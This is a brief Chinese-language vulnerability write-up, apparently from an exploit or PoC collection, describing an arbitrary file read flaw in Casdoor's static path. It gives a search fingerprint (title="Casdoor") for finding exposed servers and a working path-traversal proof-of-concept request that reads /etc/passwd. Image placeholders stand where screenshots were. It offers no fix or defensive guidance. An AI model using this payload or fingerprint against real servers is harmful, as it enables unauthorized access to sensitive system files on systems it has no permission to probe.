Casdoor static 任意文件读取漏洞

漏洞描述

Casdoor static 存在任意文件读取漏洞,攻击者通过发送特殊的请求包可以获取服务器中的敏感文件

漏洞影响

Casdoor

网络测绘

title="Casdoor"

漏洞复现

登陆页面

img

验证POC

/static/../../../../../../../../../../../etc/passwd

img